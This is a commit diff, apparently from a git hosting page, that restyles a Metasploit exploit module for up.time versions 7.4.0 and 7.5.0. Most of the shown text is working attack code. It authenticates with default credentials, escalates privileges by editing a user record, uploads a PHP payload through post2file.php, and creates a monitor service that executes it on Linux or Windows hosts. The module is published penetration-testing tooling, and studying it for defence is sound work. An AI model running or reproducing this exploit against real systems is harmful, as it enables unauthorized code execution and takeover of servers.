Update uptime_code_exec.rb
Ewerson Guimaraes (Crash)
parent
944f47b064
commit
5539363218
|
|
@ -10,44 +10,45 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Uptime Version 7.4.0 / 7.5.0 Upload and Exec file',
|
||||
'Description' => '
|
||||
This module exploits a vulnerability found in Uptime
|
||||
version 7.4.0 and 7.5.0 By supplying a specially
|
||||
crafted request is possible to upload file and execute
|
||||
arbitrary commands through privilege escalation.
|
||||
',
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [
|
||||
'Ewerson Guimaraes(Crash) <crash[at]dclabs.com.br>',
|
||||
'Gjoko Krstic(LiquidWorm) <gjoko[at]zeroscience.mk>'
|
||||
],
|
||||
'References' => [
|
||||
['URL', 'https://www.exploit-db.com/exploits/37888/']
|
||||
],
|
||||
'Payload' => {
|
||||
'Space' => 100_000,
|
||||
'DisableNops' => true
|
||||
},
|
||||
'Platform' => ['php'],
|
||||
'Arch' => ARCH_PHP,
|
||||
'Targets' => [
|
||||
['Automatic', {}]
|
||||
],
|
||||
'DefaultOptions' => {
|
||||
'SSL' => false
|
||||
},
|
||||
'Privileged' => 'True',
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Aug 6 2015'
|
||||
))
|
||||
'Name' => 'Uptime Version 7.4.0 / 7.5.0 Upload and Exec file',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability found in Uptime
|
||||
version 7.4.0 and 7.5.0 By supplying a specially
|
||||
crafted request is possible to upload file and execute
|
||||
arbitrary commands through privilege escalation.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Ewerson Guimaraes(Crash) <crash[at]dclabs.com.br>',
|
||||
'Gjoko Krstic(LiquidWorm) <gjoko[at]zeroscience.mk>'
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['EDB', '37888']
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 100_000,
|
||||
'DisableNops' => true
|
||||
},
|
||||
'Platform' => ['php'],
|
||||
'Arch' => ARCH_PHP,
|
||||
'Targets' => [['Automatic', {}]],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'SSL' => false
|
||||
},
|
||||
'Privileged' => 'True',
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Aug 6 2015'))
|
||||
|
||||
register_options([
|
||||
Opt::RPORT(9999),
|
||||
OptString.new('USERNAME', [true, 'The username to authenticate as', 'sample']),
|
||||
OptString.new('PASSWORD', [true, 'The password to authenticate with', 'sample'])
|
||||
|
||||
], self.class)
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(9999),
|
||||
OptString.new('USERNAME', [true, 'The username to authenticate as', 'sample']),
|
||||
OptString.new('PASSWORD', [true, 'The password to authenticate with', 'sample'])
|
||||
], self.class)
|
||||
end
|
||||
# Application Check
|
||||
def check
|
||||
|
|
@ -57,7 +58,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
)
|
||||
vprint_status("#{peer} - Checking version...")
|
||||
|
||||
if !res.nil? && res.code == 200 && (res.body.include?('up.time 7.5.0') || res.body.include?('up.time 7.4.0'))
|
||||
if res && res.code == 200 && (res.body.include?('up.time 7.5.0') || res.body.include?('up.time 7.4.0'))
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
Exploit::CheckCode::Safe
|
||||
|
|
@ -76,21 +77,23 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
|
||||
# #Check OS #
|
||||
phpfile_name = rand_text_alpha(10)
|
||||
if !res_auth.nil? && res_auth.headers['Server'] =~ /Unix/
|
||||
if res_auth && res_auth.headers['Server'] =~ /Unix/
|
||||
vprint_status('Found Linux installation - Setting appropriated PATH')
|
||||
phppath = '/usr/local/uptime/apache/bin/php'
|
||||
uploadpath = '/usr/local/uptime/GUI/wizards'
|
||||
cmdargs = uploadpath + '/' + phpfile_name + '.txt'
|
||||
## cmdargs = uploadpath + '/' + phpfile_name + '.txt'
|
||||
cmdargs = "#{uploadpath}#{phpfile_name}.txt"
|
||||
cmd = phppath
|
||||
else
|
||||
vprint_status('Found Windows installation - Setting appropriated PATH')
|
||||
phppath = 'C:\\Program Files\\uptime software\\uptime\\apache\\php\\php.exe'
|
||||
uploadpath = 'C:\\Program Files\\uptime software\\uptime\\GUI\\wizards'
|
||||
uploadpath = 'C:\\Program Files\\uptime software\\uptime\\GUI\\wizards\\'
|
||||
cmd = 'c:\\windows\\system32\\cmd.exe'
|
||||
cmdargs = '/K "' + '"' + phppath + '" ' + '"' + uploadpath + '\\' + phpfile_name + '.txt' + '"' + '"'
|
||||
## cmdargs = '/K "' + '"' + phppath + '" ' + '"' + uploadpath + '\\' + phpfile_name + '.txt' + '"' + '"'
|
||||
cmdargs = "/K \"\"#{phppath}\" \"#{uploadpath}#{phpfile_name}.txt\"\""
|
||||
end
|
||||
|
||||
if !res_auth.nil? && res_auth.get_cookies =~ /login=true/
|
||||
if res_auth && res_auth.get_cookies =~ /login=true/
|
||||
cookie = Regexp.last_match(1)
|
||||
cookie_split = res_auth.get_cookies.split(';')
|
||||
vprint_status("Cookies Found: #{cookie_split[1]} #{cookie_split[2]}")
|
||||
|
|
@ -119,7 +122,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
'subsection' => 'edit',
|
||||
'id' => "#{get_id}"
|
||||
},
|
||||
'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
|
||||
'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
|
||||
'vars_post' => {
|
||||
'operation' => 'submit',
|
||||
'disableEditOfUsernameRoleGroup' => 'false',
|
||||
|
|
@ -152,7 +155,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
res_priv = send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, 'index.php?loggedout'),
|
||||
'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}"
|
||||
'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}"
|
||||
)
|
||||
|
||||
res_auth = send_request_cgi(
|
||||
|
|
@ -163,7 +166,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
'password' => datastore['PASSWORD']
|
||||
}
|
||||
)
|
||||
if !res_auth.nil? && res_auth.get_cookies =~ /login=true/
|
||||
if res_auth && res_auth.get_cookies =~ /login=true/
|
||||
cookie = Regexp.last_match(1)
|
||||
cookie_split = res_auth.get_cookies.split(';')
|
||||
vprint_status("New Cookies Found: #{cookie_split[1]} #{cookie_split[2]}")
|
||||
|
|
@ -177,10 +180,10 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
res_service = send_request_cgi(
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'main.php'),
|
||||
'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
|
||||
'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
|
||||
'vars_get' => {
|
||||
'section' => 'ERDCInstance',
|
||||
'subsection' => 'add'
|
||||
'subsection' => 'add',
|
||||
},
|
||||
'vars_post' => {
|
||||
'initialERDCId' => '20',
|
||||
|
|
@ -261,7 +264,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
# CREATING Linux EXEC Service
|
||||
if !res_auth.nil? && res_auth.headers['Server'] =~ /Unix/
|
||||
if res_auth && res_auth.headers['Server'] =~ /Unix/
|
||||
vprint_status('Creating Linux Monitor Code exec...')
|
||||
create_exec_service(cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs)
|
||||
|
||||
|
|
@ -277,7 +280,8 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'wizards', 'post2file.php'),
|
||||
'vars_post' => {
|
||||
'file_name' => phpfile_name + '.txt',
|
||||
## 'file_name' => phpfile_name + '.txt',
|
||||
'file_name' => "#{phpfile_name}.txt",
|
||||
'script' => payload.encoded
|
||||
}
|
||||
)
|
||||
|
|
@ -288,7 +292,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
'uri' => normalize_uri(target_uri.path, 'wizards', "#{phpfile_name}.txt")
|
||||
)
|
||||
|
||||
if !res_up_check.nil? && res_up_check.code == 200
|
||||
if res_up_check && res_up_check.code == 200
|
||||
print_good("File found: #{phpfile_name}")
|
||||
else
|
||||
print_error('File not found')
|
||||
|
|
|
|||
Loading…
Reference in New Issue